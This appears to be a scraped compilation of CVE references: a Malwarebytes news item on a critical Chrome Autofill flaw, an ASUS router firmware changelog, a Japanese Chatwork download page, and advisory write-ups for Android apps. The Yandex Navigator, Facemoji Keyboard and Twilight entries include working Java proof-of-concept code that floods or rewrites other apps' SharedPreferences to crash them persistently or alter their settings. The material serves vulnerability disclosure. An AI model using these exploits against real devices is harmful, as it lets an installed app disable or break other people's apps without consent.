Categories: Exploits and vulnerabilities
Categories: News
Tags: Google

Tags:  Chrome

Tags:  Autofill

Tags:  payments critical

Tags:  CVE-2023-3214

Google has released an update which includes five security fixes including a critical vulnerability in Autofill payments.



(Read more...)




The post Update Chrome now! Google fixes critical vulnerability in Autofill payments appeared first on Malwarebytes Labs.

Google has released a Chrome update which includes five security fixes. One of these security fixes is for a critical vulnerability in Autofill payments.

Google labels vulnerabilities as critical if they allow an attacker to run arbitrary code on the underlying platform with the user's privileges in the normal course of browsing.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. 114.0.5735.130/.131 for Android will become available on Google Play over the next few days.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

_Chrome needs a relaunch to apply the update_

After the update, your version should be 114.0.5735.133 for Mac and Linux, and 114.0.5735.133/134 for Windows, or later.

**The critical vulnerability**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The critical CVE patched in these updates is listed as CVE-2023-3214:  Use after free in Autofill payments in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Google is always very careful about providing information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the vulnerability description we can learn a few things.

The Autofill payments function is to automatically enter payment details in online forms.

Use after free (UAF) is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

A remote attack means that this vulnerability could potentially be exploited by tricking the user into visiting a specially crafted website.

Whether all this actually means that vulnerable Chrome versions will spill payments details on such a website remains to be seen, but it’s not the unlikeliest of scenarios.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update Chrome now! Google fixes critical vulnerability in Autofill payments

ASUS Router RT-AX3000 Firmware versions prior to 3.0.0.4.388.23403 uses sensitive cookies without 'Secure' attribute. When an attacker is in a position to be able to mount a man-in-the-middle attack, and a user is tricked to log into the affected device through an unencrypted ('http') connection, the user's session may be hijacked.

**BIOS & FIRMWARE**

*   Driver & Tools
*   BIOS & FIRMWARE

Firmware

ASUS RT-AX3000 Firmware version 3.0.0.4.388.23403

Version 3.0.0.4.388.23403

92.17 MB

2023/05/31

New features:  
\-Built-in Surfshark in VPN Fusion allows you to surf the internet anonymously and securely from anywhere by encrypting connections. Please refer to https://asus.click/SurfsharkVPN

\-iPhone/Android USB auto backup WAN allows you to connect your phone to the router’s USB port and use it as an internet source. Please refer to https://asus.click/AutobackupWAN

\-DDNS transfer allows you to transfer your ASUS DDNS hostname from your original router to the new one. Please refer to https://asus.click/ASUSDDNS

Bug fixes and functionality modifications:  
\-Resolved the issue with login and password changes.  
\-Resolved the IPSec VPN connection issues.  
\-Resolved the Instant Guard connection issues.  
\-Fixed the AiCloud login issue after unplugging and plugging the HDD into the USB port.  
\-Fixed the issue where Traffic Analyzer sometimes couldn't record data.  
\-Fixed the time display issue for the preferred upgrade time in the Auto Firmware Upgrade function.  
\-Fine-tuned the description for port status.  
\-Enabled DynDNS and No-IP DDNS to use IPv6.  
\-Fixed AiMesh preferred AP identification in site survey results.  
\-Updated timezone list for Greenland, Mexico, and Iran.  
\-Modified the USB application option text in dual WAN.  
\-Allowed WireGuard Server clients to access the Samba server.  
\-Fixed memory leak issue.  
\-Enabled the failback function when using the iOS/Android USB backup WAN.  
\-The ARP response issue has been resolved, along with the connection issue between the router and the ROG Phone 6 and 7.  
\-Resolved the issue where the USB path is not displayed on the Media Server page in the AiMesh node

Security updates:  
\-Enabled and supported ECDSA certificates for Let's Encrypt.  
\-Enhanced protection for credentials.  
\-Enhanced protection for OTA firmware updates.  
\-Fixed DoS vulnerabilities in firewall configuration pages. Thanks to Jinghe Gao's contribution.  
\-Fixed DoS vulerabilities in httpd. Thanks to Howard McGreehan.  
\-Fixed information disclosure vulnerability. Thanks to Junxu (Hillstone Network Security Research Institute) contribution.  
\-Fixed CVE-2023-28702 and CVE-2023-28703. Thanks to Xingyu Xu(@tmotfl) contribution.  
\-Fixed null pointer dereference vulnerabilities. Thanks to Chengfeng Ye, Prism Research Group - cse hkust contribution.  
\-Fixed the cfg server vulnerability. Thanks to Swing and Wang Duo from Chaitin Security Research Lab.  
\-Fixed the vulnerability in the logmessage function. Thanks to Swing and Wang Duo from Chaitin Security Research Lab C0ss4ck from Bytedance Wuheng Lab, Feixincheng from X1cT34m.  
\- Fixed CVE-2023-31195

Please unzip the firmware file, and then verify the checksum.  
SHA256: 5975e675481949dd7a9a29e3e3cb9f3fdd1aa7e757f1fef1f4e40073dee843fe

ASUS RT-AX3000 Firmware version 3.0.0.4.388.22525

Version 3.0.0.4.388.22525

90.61 MB

2023/02/16

1.Fixed CVE-2022-46871  
2.Fixed Client DOM Stored XSS.  
3.Improved AiMesh backhaul stability.  
4.Fixed AiMesh topology UI bugs.  
5.Fixed the reboot issue when assigning specific clients in VPN fusion.  
6.Fixed the VPN fusion bug when importing the Surfshark WireGuard conf file.  
7.Fixed network map bugs.

Please unzip the firmware file first then check the MD5 code.  
MD5: 5532bb77bc2afc51c85b76bb7d4f3f1a

ASUS RT-AX3000 Firmware version 3.0.0.4.388.22237

Version 3.0.0.4.388.22237

90.6 MB

2023/01/11

1\. Supported WireGuard VPN server and client.  
2\. Supported VPN fusion. It can easily achieve VPN connection to network devices like Smart TV, Game consoles and without installing the VPN client software.  
3\. Supported new devices connection notification.  
4\. Supported connection diagnostic on the ASUS router app.  
5\. Supported Instant Guard 2.0 which helps easily invite family or friends to join the VPN connection.  
6\. Upgraded parental control and added reward, new scheduler for flexible setting  
7\. Fixed USB icon issue in port status.  
8\. Fixed HTTP response splitting vulnerability. Thanks to Efstratios Chatzoglou, University of the Aegean.  
9\. Fixed status page HTML vulnerability. Thanks to David Ward.  
10\. Fixed CVE-2018-1160. Thanks to Steven Sroba.  
11\. Fixed cfg\_server security issue.

Please unzip the firmware file first then check the MD5 code.  
MD5: cae183e7cb66cb79af55dc6295be2fe1

ASUS RT-AX3000 Firmware version 3.0.0.4.386.49674

Version 3.0.0.4.386.49674

107.1 MB

2022/07/21

1\. Fixed CVE-2022-23970, CVE-2022-23971, CVE-2022-23972, CVE-2022-23973, CVE-2022-25595, CVE-2022-25596, CVE-2022-25597, CVE-2022-26376,CVE-2021-34174, CVE-2022-26376,CVE-2022-0778  
2\. Fixed CVE-2018-1160. Thanks to Steven Sroba  
3\. Fixed Stored XSS vulnerability. Thanks to Milan Kyselica of IstroSec.  
4\. Fixed anomalous 802.11 frame issues.  
Thanks to Kari Hulkko and Tuomo Untinen from The Synopsys Cybersecurity Research Center (CyRC). Issue was found by using Defensics Fuzz Testing Tool.  
5\. Fixed v6plus issues.  
6\. Added 3rd party DNS server list in WAN --> DNS to help users enhance the connection security.  
7\. Supported Safe Browsing in the router app to filter explicit content from search results. You can set it in the router app --> Devices or Family.  
8\. Improved system stability.

Please unzip the firmware file first then check the MD5 code.  
MD5: e6585b0748c26aec8e5a4625affc2ca3

ASUS RT-AX3000 Firmware version 3.0.0.4.386.48908

Version 3.0.0.4.386.48908

107.59 MB

2022/05/24

1.Fix IPv6+ related issues  
2.Improve system stability  
3.GUI bugs fixed.

Please unzip the firmware file first then check the MD5 code.  
MD5: 84eda699d7ebe5ae552499768b71823d

ASUS RT-AX3000 Firmware version 3.0.0.4.386.48631

Version 3.0.0.4.386.48631

107.63 MB

2022/04/22

1\. Fixed AiMesh dose not work properly.  
2\. Fixed OpenSSL CVE-2022-0778  
3\. Added more security measures to block malware.  
4\. Fixed Stored XSS vulnerability. Thanks to Milan Kyselica of IstroSec.  
5\. Fixed CVE-2022-23970, CVE-2022-23971, CVE-2022-23972, CVE-2022-23973, CVE-2022-25595, CVE-2022-25596, CVE-2022-25597  
6\. Fixed CVE-2021-34174

Please unzip the firmware file first then check the MD5 code.  
MD5: 901eaf86a2b1188f5e6019455f9b1884

ASUS RT-AX3000 Firmware version 3.0.0.4.386.47029

Version 3.0.0.4.386.47029

108.19 MB

2022/01/10

1\. Fixed v6plus related issues  
2\. Firewall supports IPv6 list.  
3\. Fixed the case of some ISP only can get the private IPv6 address.  
4\. Minor GUI bug fixes.  
\*Due to core software module upgrade, if you wanna to upgrade to this version, please must update your router to 3.0.0.4.386.45898 first.

Please unzip the firmware file first then check the MD5 code.  
MD5:A35D678FCA72D8536F3F126AA0E4D88A

ASUS RT-AX3000 Firmware version 3.0.0.4.386.45898

Version 3.0.0.4.386.45898

53.31 MB

2021/10/07

1\. Fixed AiMesh web page multi-language issues.  
2\. Fixed Let's encrypt issues.  
3\. Fixed Stored XSS vulnerability.  
4\. Fixed CVE-2021-41435, CVE-2021-41436.  
Thanks to Efstratios Chatzoglou, University of the Aegean  
Georgios Kambourakis, European Commission at the European Joint Research Centre  
Constantinos Kolias, University of Idaho.  
5\. Fixed Stack overflow vulnerability. Thanks to Jixing Wang (@chamd5) contribution.  
6\. Fixed information disclosure vulnerability .Thanks to CataLpa from DBappSecurity Co.,Ltd Hatlab and 360 Alpha Lab contribution.

Please unzip the firmware file first then check the MD5 code.  
MD5: 4b80f4f7c3bbf390dada553702f4879c

Show all

CVE-2023-31195: RT-AX3000｜WiFi Routers｜ASUS Global

Code injection vulnerability exists in Chatwork Desktop Application (Mac) 2.6.43 and earlier. If this vulnerability is exploited, a non-administrative user of the Mac where the product is installed may store and obtain audio and image data from the product without the user's consent.

**使用方法**

下記ボタンから新規会員登録をおこなうことで、無料アカウントを発行できます。  
パソコンからブラウザにアクセスすることで、Chatworkをご利用いただけます。

**動作推奨ブラウザ**

*   Google Chrome
*   Firefox
*   Safari
*   Microsoft Edge（Chromiumベース）

最新バージョンをご使用ください。  
（詳しい動作環境はヘルプページをご覧ください。）

※Internet Explorerは2021/09/22（水）にサポート終了しました。詳しくはヘルプページをご確認ください。

※スマホ・タブレットからご利用したいユーザーは、モバイル版Chatworkアプリをご使用ください。

**Chatworkアプリのご紹介**

**デスクトップ版アプリ（Windows/Mac）**

デスクトップ版アプリでは、一度に複数のChatworkアカウントにログインすることができ、GmailやSkypeなど他社のコミュニケーションサービスも1ヶ所にまとめて利用できます。

*   **Windows**
    
    Windows 10 以上
    
     
*   **Mac**
    
    OS X 10.13 (High Sierra) 以上
    

※macOS 版は Intel プロセッサおよび Apple プロセッサ (Apple M1 チップ) を搭載した Mac をサポートしています。

**Chatworkアプリのご紹介****モバイル版アプリ（iOS/Android）**

モバイル版アプリをインストールすることで、お手持ちのスマホ・タブレットから快適にChatworkを閲覧・操作することができます。

動作保証環境については各アプリストアのページをご参照ください。

 

※ スマートフォン以外の携帯電話（フィーチャーフォン）は、現在対応しておりません。

CVE-2023-32546: ダウンロード | ビジネスチャットならChatwork

Jiyu Kukan Toku-Toku coupon App for iOS versions 3.5.0 and earlier, and Jiyu Kukan Toku-Toku coupon App for Android versions 3.5.0 and earlier are vulnerable to improper server certificate verification. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on an encrypted communication.

CVE-2023-29501

Categories: News
Tags: week in security

A list of topics we covered in the week of June 5 to June 11 of 2023



(Read more...)




The post A week in security (June 5 - 11) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

iPhone Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (June 5 - 11)

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Yandex Navigator（CVE-2023-29751）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

while (true) {
    ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
    Intent intent = new Intent();
    intent.setComponent(componentName);
    intent.putExtra("service\_version", 0);
    intent.setAction("ru.yandex.common.clid.update\_preferences");
    intent.putExtra("preferences", "STORAGE");
    intent.putExtra("application", "ru.yandex.yandexnavi");
    Bundle bundle = new Bundle();
    Bundle bundle2 = new Bundle();
    Bundle bundle3 = new Bundle();
    String randomString = getRandomString(50240);
    bundle2.putString(randomString, randomString);
    bundle3.putLong(randomString, Long.MAX\_VALUE);
    bundle.putBundle("bundle-values", bundle2);
    bundle.putBundle("bundle-time", bundle3);
    intent.putExtra("bundle", bundle);
    ServiceConnection connection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service){
        
        }
        @Override
        public void onServiceDisconnected(ComponentName name) {
            
        }
    };
    bindService(intent,connection,BIND\_AUTO\_CREATE);
}

CVE-2023-29751: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.

**Denial of Service exists in Facemoji Emoji Keyboard（CVE-2023-29753）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
      //targetSharedPreferencesName: any sharedpreferences's name in the app
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx");
        while (true){
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key",randomString);
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Yandex Navigator（CVE-2023-29749）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file, which is loaded into memory for use at application startup, thus affecting the implementation of certain features of the application. For example, an attacker can modify the "notification-enabled" value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided in the exposed components of the Yandex Navigator application. This can turn off the search box in the notification bar of the application, affecting the normal functionality of the application and causing an escalation of privilege attack. In fact, attacker can insert data into any SharedPreferences file whose name start with 'ru.yandex.yandexnavi.', like 'ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES' . In fact, I found that there are many SharedPreferences files like this and they store a lot of important data.

poc：

public void attack\_ru() {
        ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
        Intent intent = new Intent();
        intent.setComponent(componentName);
        intent.putExtra("service\_version", 0);
        intent.setAction("ru.yandex.common.clid.update\_preferences");
        intent.putExtra("preferences", "ui.PermissionDelegateImpl.PREFERENCES");
        intent.putExtra("application", "ru.yandex.yandexnavi");
        Bundle bundle = new Bundle();
        Bundle bundle2 = new Bundle();
        Bundle bundle3 = new Bundle();
        bundle2.putBoolean("MICROPHONE", false);
        long time = 1657202353619L;
        bundle3.putLong("MICROPHONE", time);
        bundle.putBundle("bundle-values", bundle2);
        bundle.putBundle("bundle-time", bundle3);
        intent.putExtra("bundle", bundle);
        ServiceConnection connection = new ServiceConnection() {
            @Override
            public void onServiceConnected(ComponentName name, IBinder service) {
            }
            @Override
            public void onServiceDisconnected(ComponentName name) {
            }
        };
        bindService(intent, connection, BIND\_AUTO\_CREATE);
    }

CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

**Escalation of Privileges exists in Facemoji Emoji Keyboard（CVE-2023-29752）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application launch and affects critical application functionality. Specifically, an attacker is able to modify the data in the profile\_enable\_subtype.xml file by constructing an intent carrying malicious data. When the key\_enable\_subtype field is modified to an arbitrary string, the virtual keyboard that comes with this application will not be able to output any characters. More seriously, when the key\_enable\_subtype and key\_subtype\_enable\_layout fields are modified to any string at the same time, the virtual keyboard will not pop up when any input box is clicked, and the application will keep reporting errors, leading to escalation of privilege attacks.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/profile\_enable\_subtype/xxx");
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key","key\_enable\_subtype");
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
    }

CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Twilight（CVE-2023-29755）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
    ContentValues contentValues = new ContentValues();
//attacker can update any data in sharedpreferences!
    contentValues.put(targetKey,targetValue);
    contentResolver.insert(parse,contentValues);
    System.out.println("输入数据");

Tag

#android